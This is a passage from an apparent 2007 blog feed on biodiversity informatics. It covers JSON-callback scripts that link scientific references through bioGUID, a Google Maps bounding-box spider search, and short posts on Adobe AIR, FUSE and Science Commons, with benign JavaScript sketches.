You have to remember that there is next to NO mark-up or any additional effort for someone to take advantage of this. I only have a few JavaScript files in the &amp;lt;body&amp;gt; section of this page and I mark-up the stuff I want to have a tooltip with &amp;lt;span class="lifeform"&amp;gt;name here&amp;lt;/span&amp;gt;. This is pretty cool if I do say so myself.&lt;br /&gt;I initially tried this technique with Flickr, but they don't permit square brackets in a callback function. So, I wrote the developers and alerted them to this cool new toy. Hopefully, they'll open the gates a little more and not be so restrictive.&lt;br /&gt;&lt;br /&gt;Forgive me...I just can't help myself:&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Carabus nemoralis&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Argiope aurantia&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;&lt;i&gt;Culex quinquefasciatus&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;duck-billed platypus&lt;/span&gt;&lt;br /&gt;&lt;span class="lifeform"&gt;slime mould&lt;/span&gt;&lt;br /&gt;...How many more million to go?...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8878359066787038160?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8878359066787038160/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8878359066787038160' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8878359066787038160'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8878359066787038160'/><link rel='alternate' type='text/html' 
href='http://ispiders.blogspot.com/2007/08/json-is-kewl.html' title='JSON is Kewl'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6425471825609363392</id><published>2007-08-19T23:25:00.000-06:00</published><updated>2007-10-06T14:12:34.361-06:00</updated><title type='text'>Gimme That Scientific Paper Part III</title><content type='html'>&lt;script type="text/javascript" src="http://www.canadianarachnology.org/bioGUID/jsonbioGUID.js"&gt;&lt;/script&gt;&lt;br /&gt;&lt;div style="background:#f0fff0;border:1px #000 solid;padding:5px;width:400px;margin:0px auto"&gt;&lt;b&gt;Update Sep 28, 2007&lt;/b&gt;: Internet Explorer 6 &lt;a href="http://ispiders.blogspot.com/2007/09/ie6-is-crap-by-design.html"&gt;refuses to cache images properly&lt;/a&gt; so I have an alternate version of the script that disables the functionality described below for these users. You may see it in action &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;HERE&lt;/a&gt;. Also, the use of spans (see below) may be too restrictive for you to implement so I developed a "spanless" version of the script &lt;a href="http://www.canadianarachnology.org/bioGUID/jsonbioGUIDv2.js"&gt;HERE&lt;/a&gt;. 
This version only requires the following mark-up for each cited reference and you can of course change a line in the script if you're not pleased with the class name and want to use something else:&lt;br&gt;&lt;span style="font-size:x-small"&gt;&amp;lt;p class="article"&amp;gt;Full reference and HTML formatting allowed&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Those who have followed along in this blog will recall that I dislike seeing references to scientific papers on web pages when there are no links to download the reprint. And, even when the page author makes a bit of effort, the links are often broken. One solution to this in the library community is to use COinS. But, this spec absolutely sucks for a page author because there is quite a bit of additional mark-up that has to be inserted in a very specific way. [Thankfully, there is at least one COinS generator you can use.] I was determined to find a better solution than this.&lt;br /&gt;You may also recall that I came up with an AJAX solution together with Rod Page. However, that solution used Flash as the XMLHTTP parser, which meant that a crossdomain.xml file had to be put on Rod's server, i.e. this really wasn't a cross-domain solution unless Rod were to open up his server to all domains. Yahoo does this, but it really wasn't practical for Rod. As a recap, this is what I did in earlier renditions:&lt;br /&gt;The JavaScript automatically read all the references on a page (as long as they were sequentially numbered) and auto-magically added some little search icons such as &lt;img id="BLOGGER_PHOTO_ID_5100651715851095794" alt="" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rskntg5KjvI/AAAAAAAAADM/541IbU1x47E/s320/magnifier.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;. When these were clicked, the references were searched via Rod Page's &lt;a href="http://bioguid.info/"&gt;bioGUID&lt;/a&gt; reference parsing service. 
If a DOI or a handle was found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652063743446786" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RskoBw5KjwI/AAAAAAAAADU/h9HH6sXb1as/s320/world_go.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;; if a PDF was found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652480355274514" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskoaA5KjxI/AAAAAAAAADc/Gvqyera_UOk/s320/page_white_acrobat.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;; if neither a PDF nor a link via DOI or handle was found, the icon changed to &lt;img id="BLOGGER_PHOTO_ID_5100652531894882082" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskodA5KjyI/AAAAAAAAADk/5maV9CunPEc/s320/g_scholar.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt; whereby you could search for the title on Google Scholar; and finally, if the reference was not successfully parsed in bioGUID, then the icon changed to an "un"-clickable &lt;img id="BLOGGER_PHOTO_ID_5100652600614358834" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RskohA5KjzI/AAAAAAAAADs/Z8y0naM7gOU/s320/delete.png" border="0" height="16px" width="16px" style="border:0px; margin:0px;padding:0px" /&gt;. If you wanted to take advantage of this new toy on your web pages, you either had to contact Rod and ask that your domain be added to his crossdomain.xml file or set up a PHP/ASP/etc. proxy. But, Rod has now been very generous...&lt;br /&gt;&lt;br /&gt;Rod now spits out JSON with a callback function. What this means is that there are no longer any problems with cross-domain issues as is typically the case with XMLHTTP programming. 
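&lt;br /&gt;&lt;br /&gt;For the curious, here is a minimal sketch of how JSON with a callback can be requested from a script on another domain. It is an illustration only, not the contents of jsonbioGUID.js: the endpoint URL, the "q" and "callback" parameter names, and the helper names (buildJsonpUrl, requestJsonp, jsonpCallbacks) are all assumptions, and it leans on the modern URL API. Each request gets its own slot in an array of callbacks, so searches fired in rapid succession do not overwrite one another:&lt;br /&gt;&lt;pre&gt;
```javascript
// Hypothetical registry: one slot per pending request, so concurrent
// requests never share (or overwrite) a single global callback.
var jsonpCallbacks = [];

// Build the request URL. The endpoint and the "q" / "callback" parameter
// names are assumptions made for this sketch, not a documented API.
function buildJsonpUrl(endpoint, query, slot) {
  var url = new URL(endpoint);
  url.searchParams.set("q", query);
  url.searchParams.set("callback", "jsonpCallbacks[" + slot + "]");
  return url.toString();
}

// Register a handler, then (in a browser only) append a script element
// whose response is expected to look like: jsonpCallbacks[0]({...});
function requestJsonp(endpoint, query, onData) {
  var slot = jsonpCallbacks.length;
  jsonpCallbacks.push(function (data) {
    // Turn the used slot into a no-op; slots are never reused.
    jsonpCallbacks[slot] = function () {};
    onData(data);
  });
  var src = buildJsonpUrl(endpoint, query, slot);
  if (typeof document !== "undefined") {
    var script = document.createElement("script");
    script.src = src;
    document.getElementsByTagName("head")[0].appendChild(script);
  }
  return src;
}
```
&lt;/pre&gt;A call such as requestJsonp("http://example.org/parse", "Buckle 1973", showIcon), where showIcon is whatever function updates the page, returns immediately; the matching slot is invoked whenever the server's response arrives. Note the square brackets in the callback name, which the server has to accept for this approach to work.&lt;br /&gt;&lt;br /&gt;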
To make a long story short, if you are a web page author and include a number of scientific references on your page(s), all you need do is grab the JavaScript file &lt;a href="http://www.canadianarachnology.org/bioGUID/jsonbioGUID.js"&gt;HERE&lt;/a&gt;, grab the images above, adjust the contents of the JavaScript to point to your images, then wrap up each of your references in span elements as follows:&lt;br /&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span class="article"&amp;gt;This is one full reference.&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span class="article"&amp;gt;This is another reference.&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;etc.&lt;br /&gt;How easy is that?!&lt;br /&gt;To see this in action, have a peek at the &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;references section&lt;/a&gt; of The Nearctic Spider Database.&lt;br /&gt;&lt;br /&gt;Or, you can try it yourself here:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;span class="article"&gt;Buckle, D. J. 1973. A new Philodromus (Araneae: Thomisidae) from Arizona. &lt;em&gt;J. Arachnol.&lt;/em&gt; &lt;strong&gt;1:&lt;/strong&gt; 142-143.&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;For the mildly curious and for those who have played with JSON outputs with a callback function, I ran into a snag that caused no end of grief. When one appends a JSON callback to a page header, a function call is dynamically inserted. This works great when only one instance of that function is needed at a time. However, in this case, a user may want to call several searches in rapid succession before any previous call has finished. As a consequence, the appended callback functions may pile up on each other and steal each other's scope. 
The solution was to dump the callback functions into an array, which was mighty tricky to handle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6425471825609363392?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6425471825609363392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6425471825609363392' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6425471825609363392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6425471825609363392'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/gimme-that-scientific-paper-part-iii.html' title='Gimme That Scientific Paper Part III'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rskntg5KjvI/AAAAAAAAADM/541IbU1x47E/s72-c/magnifier.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5073047403936789293</id><published>2007-08-15T22:14:00.000-06:00</published><updated>2007-08-15T22:45:11.369-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><category scheme='http://www.blogger.com/atom/ns#' term='mindmap'/><category scheme='http://www.blogger.com/atom/ns#' term='trees'/><title type='text'>Mind Dumps...er...Maps/Graphs/Trees</title><content 
type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s1600-h/mindomo_logo.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5099154348517789410" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s320/mindomo_logo.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Since Adobe has been &lt;a href="http://onair.adobe.com/"&gt;driving across the US&lt;/a&gt;, selling some &lt;a href="http://labs.adobe.com/technologies/air/"&gt;AIR&lt;/a&gt;, I thought I'd take a closer look at Flex/Flash applications that might fit the bill for some &lt;a href="http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html"&gt;tough ideas&lt;/a&gt; I have been wrestling with. In a somewhat similar GUI struggle, Rod Page has been &lt;a href="http://iphylo.blogspot.com/2007/08/viewing-very-large-trees.html"&gt;feverishly&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-ii.html"&gt;playing&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-iii.html"&gt;with&lt;/a&gt; &lt;a href="http://iphylo.blogspot.com/2007/08/visualising-very-big-trees-part-iv.html"&gt;Supertrees&lt;/a&gt;, trying to find a web-based, non-Java solution. So, I did a bit of digging into some &lt;a href="http://offlinetech.blogspot.com/search/label/AIR"&gt;showcased Adobe AIR applications&lt;/a&gt; - &lt;a href="http://www.adobeairtutorials.com/"&gt;tutorial&lt;/a&gt; and &lt;a href="http://airchive.codeapollo.com/browse.php"&gt;demo&lt;/a&gt; &lt;a href="http://www.scalenine.com/showcase.php"&gt;sites&lt;/a&gt; are cropping up all over the place - and a Flex application that will soon be transformed into AIR caught my eye: &lt;a href="http://www.mindomo.com/"&gt;Mindomo&lt;/a&gt;. 
Now, if this mindmapping application had RDF tying the bits together, which came via distributed web services from GBIF, GenBank, CrossRef, etc., we'd have a real winner here. Mindomo is exactly the application I have been dreaming about for The &lt;a href="http://www.eol.org/"&gt;Encyclopedia of Life&lt;/a&gt; (EOL)'s WorkBench; it just has to be pinned down into the biological, semantic web world. Since an AIR application can wrap all this up in a web/desktop hybrid application, I am convinced this is what EOL absolutely must produce.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5073047403936789293?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5073047403936789293/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5073047403936789293' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5073047403936789293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5073047403936789293'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/mind-dumpsermapsgraphstrees.html' title='Mind Dumps...er...Maps/Graphs/Trees'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RsPV3Q5KjuI/AAAAAAAAADE/w61bkLzY1h0/s72-c/mindomo_logo.png' height='72' 
width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-382152069469080354</id><published>2007-08-13T23:20:00.000-06:00</published><updated>2007-10-25T13:37:31.706-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Google Finds Spiders in Your Backyard</title><content type='html'>The Google API team have added a new &lt;a href="http://googlemapsapi.blogspot.com/2007/08/you-can-always-go-back-to-where-you.html"&gt;DragZoomControl&lt;/a&gt; to the list of available functions. This feature has been bandied about for quite some time and various people have hacked together approximations for this using &lt;a href="http://groups.google.com/group/Google-Maps-API/browse_thread/thread/b8444af7755749cb/d9e179567fa7a901?lnk=gst&amp;q=dps1&amp;amp;rnum=10#d9e179567fa7a901"&gt;other JavaScript functions&lt;/a&gt;. My interest in this isn't so much the zoom function, as cool as that is, but the ability to query resources bounded by the drawn box.&lt;br /&gt;&lt;br /&gt;Kludging DragZoomControl to perform a spatial query isn't particularly practical or useful so I used a Yahoo YUI "&lt;a href="http://developer.yahoo.com/yui/examples/dragdrop/dd-resize.html"&gt;Drag &amp; Drop - Resizable Panel&lt;/a&gt;" to fix up what I was once using. What I used in the past that didn't perform well for Safari users was some scripting from Cross-Browser.com called the &lt;a href="http://www.cross-browser.com/"&gt;X Library&lt;/a&gt;. Now, with Yahoo's improvement on this, the function works as expected. Because it's very easy to add things that stay positioned within such a draggable box, the Yahoo YUI component is a much better solution. So, just as you can zoom in / zoom out with the Google DragZoomControl, so too can you put these functions within a draggable, resizable box. I'll also add that the resizing function in Yahoo's component is much smoother than Google's own DragZoomControl. 
Now the fun part...&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s1600-h/box.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5098435691653018658" style="CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s320/box.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RsE74LcmtAI/AAAAAAAAACU/zMbJYD06Wlk/s1600-h/map.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5098422089491592194" style="CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RsE74LcmtAI/AAAAAAAAACU/zMbJYD06Wlk/s320/map.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Two little icons within the draggable, resizable box allow you to search for spider images or produce a spider species list, which are based on collections records submitted to &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt;. Click &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/gmapbounds.asp"&gt;HERE&lt;/a&gt; to try your hand at it and search for spiders in your back yard.&lt;br /&gt;&lt;br /&gt;The advantage of such a simple function is that one need not have a spatial database like PostgreSQL, but can make use of any enterprise back-end. The query run is the typical minX, maxX, minY, maxY to define the four corner coordinates. With a ton of records in the backend however, the query can take a long time to complete so an index on the latitude and longitude columns may be required as explained in the &lt;a href="http://groups.google.com/group/Google-Maps-API/browse_thread/thread/b298b1aa0bd148c6/56f827709af53a70?lnk=gst&amp;amp;q=bounding+box&amp;amp;rnum=1#56f827709af53a70"&gt;Google API Group&lt;/a&gt;. 
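&lt;br /&gt;&lt;br /&gt;As a rough sketch of that bounding-box query, the four values taken from the box can be turned into a parameterized query. The table name, the column names, and the boundsToQuery and inBounds helpers below are hypothetical and are not the database's actual schema or code:&lt;br /&gt;&lt;pre&gt;
```javascript
// Turn the corners of the drawn box into a parameterized SQL query.
// Table and column names are hypothetical placeholders for this sketch.
function boundsToQuery(bounds) {
  var sql =
    "SELECT species, latitude, longitude FROM collection_records " +
    "WHERE longitude BETWEEN ? AND ? AND latitude BETWEEN ? AND ?";
  // Parameter order matches the placeholders: minX, maxX, minY, maxY.
  var params = [bounds.minX, bounds.maxX, bounds.minY, bounds.maxY];
  return { sql: sql, params: params };
}

// The same test applied in memory, handy for checking query results.
function inBounds(record, bounds) {
  return [
    record.longitude >= bounds.minX,
    bounds.maxX >= record.longitude,
    record.latitude >= bounds.minY,
    bounds.maxY >= record.latitude
  ].every(Boolean);
}
```
&lt;/pre&gt;Two plain range conditions like these are the sort of thing an ordinary index on the latitude and longitude columns can help with. The sketch ignores boxes that straddle the 180° meridian, where minX would be greater than maxX.&lt;br /&gt;&lt;br /&gt;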
If you want to see what you &lt;em&gt;can&lt;/em&gt; do with a spatial database however, have a look at what programmers for the &lt;a href="http://www.nlbif.nl/"&gt;Netherlands Biodiversity Information Facility&lt;/a&gt; have put together.&lt;br /&gt;&lt;br /&gt;Happy spider hunting... &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-382152069469080354?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/382152069469080354/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=382152069469080354' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/382152069469080354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/382152069469080354'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/google-finds-spiders-in-your-backyard.html' title='Google Finds Spiders in Your Backyard'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RsFIP7cmtCI/AAAAAAAAACk/QSlFekkvdT8/s72-c/box.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1758099376270608612</id><published>2007-08-07T11:59:00.000-06:00</published><updated>2007-08-07T13:07:43.012-06:00</updated><title type='text'>Dare to Dream Big</title><content type='html'>This post will be 
quite off-topic, but I just had to share some recent stuff in the works that caught my eye.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s1600-h/tour1-1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s320/tour1-1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5096032953803650034" /&gt;&lt;/a&gt;First up is a spin-off from research at MIT, led by Sanjit Biswas who temporarily left his Ph.D. program (are you sure, Sanjit?) to lead a company called &lt;a href="http://meraki.com"&gt;Meraki&lt;/a&gt;. The cheap, little router/repeaters permit the creation of "smart", distributed networks such that a single DSL connection can feed dozens of end-points. The firmware in each little gizmo permits a network admin to monetize these ad-hoc connections. Consequently, getting connected to the 'net could be as cheap as $1 a month once a user buys the attractive Meraki mini. The company also recently announced a Meraki Solar kit. Now that's forward thinking. There are dozens of testimonials on the Meraki web site, including one from the town of Salinas, Ecuador, where a network of schools is now connected even though there are no phone lines!&lt;br /&gt;&lt;br /&gt;Distributed, ad hoc connections like this reminded me of an email I recently received from Rod Page who alerted me to &lt;a href="http://fuse.sourceforge.net/"&gt;FUSE&lt;/a&gt;, which stands for "File System in Userspace". This is a Linux-based, Sourceforge project that allows a user to create &amp; mount virtual drives that contain or represent a vast array of file types. 
For example: 1) Fuse::DBI file system mounts some data from relational databases as files, 2) BloggerFS "is a filesystem that allow Blogger users to manipulate posts on their blogs via a file interface.", and 3) Yacufs "is a virtual file system that is able to convert your files on-the-fly. It allows you to access various file types as a single file type. For instance you can access your music library containing .ogg, .flac and .mp3 files, but see them all as if being .mp3 files." This all sounds very geeky, but I draw your attention to MacFUSE (sadly, there is not yet a WindowsFUSE, though it appears this functionality has &lt;a href="http://www.rentacoder.com/RentACoder/misc/BidRequests/ShowBidRequest.asp?lngBidRequestId=586300"&gt;not gone unnoticed&lt;/a&gt;):&lt;br /&gt;&lt;br /&gt;&lt;embed style="width:400px; height:326px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=3138515991250095768&amp;hl=en-CA" flashvars=""&gt; &lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;So what? Isn't this just like some sort of peer-to-peer system? Absolutely not. This is more like a distributed content management system and, coupled with a highly intelligent Yacufs-like extension, it means that file types (e.g. MS Word, OpenOffice, etc.) can be converted on-the-fly to whatever file format you want or need. To step this thinking up a bit in case you have no idea why this is relevant to ecology or systematics, have a look at the cool things Cynthia Parr and her colleagues are doing to visualize distributed data sets: doi:&lt;a href="http://dx.doi.org/10.1016/j.ecoinf.2007.03.005"&gt;10.1016/j.ecoinf.2007.03.005&lt;/a&gt;. FUSE means the work Cynthia &amp; others are doing (e.g. &lt;a href="http://seek.ecoinformatics.org/"&gt;SEEK&lt;/a&gt;) doesn't need a GUI. Rather, we just need a way to organize the gazoodles of files that would/could be present in an ecologically- or taxonomically-relevant filesystem. 
Maybe I should coin these EcoFS and TaxonFS :)~&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1758099376270608612?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1758099376270608612/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1758099376270608612' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1758099376270608612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1758099376270608612'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/08/dare-to-dream-big.html' title='Dare to Dream Big'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/Rri--Lcms_I/AAAAAAAAACM/LVoKCgv-7lE/s72-c/tour1-1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-222144332799719986</id><published>2007-07-24T13:30:00.000-06:00</published><updated>2007-07-24T14:06:15.578-06:00</updated><title type='text'>The Next Scientific Revolution?</title><content type='html'>&lt;a href="http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s1600-h/scicomlogo.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" 
src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s320/scicomlogo.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5090852480215331810" /&gt;&lt;/a&gt;&lt;br /&gt;With the advent of Science Commons (see the &lt;a href="http://www.popsci.com/popsci/technology/f8a1780809ed3110vgnvcm1000004eecbccdrcrd.html"&gt;popsci.com article&lt;/a&gt;) and cool new tools available at &lt;em&gt;Nature&lt;/em&gt; like its &lt;a href="http://precedings.nature.com/"&gt;Precedings&lt;/a&gt;, opportunities to share research outside for-profit business models (&lt;em&gt;i.e.&lt;/em&gt; journals) are starting to gain momentum. Systems like &lt;a href="http://sciencecommons.org/projects/data/"&gt;Neurocommons&lt;/a&gt; allow for a redrawing of money transfer trajectories around and within publishing firms such that everyone can play nice in the sandbox. Medical research sells no matter how you redraw the lines or rebuild the castle. But, I wonder if the discussions around these "revolutions" have attempted to include pure research whose business model is based entirely on public funds and funding institutions that receive their monies from government pots? How do you sell Science Commons to mathematicians, theoretical physicists, systematists, ecologists, among other scientists whose research is not closely tied to big bucks pharmaceutical companies and a Gates Foundation? Repositories like &lt;a href="http://www.ibridgenetwork.org/"&gt;iBridge&lt;/a&gt; are useful for niche markets and interests, but I'd hardly call them revolutionary for all of &lt;em&gt;science&lt;/em&gt;. 
If proponents of the Semantic Web want to sell their ideas, I'd like to see buy-in by one tenured ecologist &amp; then some demonstrable evidence for how this will accelerate his/her research.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-222144332799719986?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/222144332799719986/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=222144332799719986' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/222144332799719986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/222144332799719986'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/07/next-scientific-revolution.html' title='The Next Scientific Revolution?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RqZXW7cms-I/AAAAAAAAACE/RlNqol31gB0/s72-c/scicomlogo.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5673283253336777174</id><published>2007-07-19T14:18:00.000-06:00</published><updated>2007-07-20T10:19:07.378-06:00</updated><category 